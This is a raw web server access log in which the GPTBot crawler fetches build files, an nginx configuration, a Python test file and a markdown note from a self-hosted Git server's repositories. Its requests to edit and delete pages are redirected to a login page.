[Length 11297] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11871] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71826] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14720] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:28:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10849] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11228] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31163] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10225] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10658] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11063] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153441] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:29:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:29:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 926] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:14:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11398] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" -[17/Feb/2026:14:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11397] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" -[17/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11396] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" -[17/Feb/2026:14:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11397] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" -[17/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11397] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" -[17/Feb/2026:14:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11397] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" -[17/Feb/2026:14:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11399] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" -[17/Feb/2026:14:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11398] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" -[17/Feb/2026:14:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 76514] [Gzip 16.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:14:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 238960] [Gzip 15.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:14:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 57146] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:14:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9929] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9928] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9929] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9928] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" -[17/Feb/2026:14:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 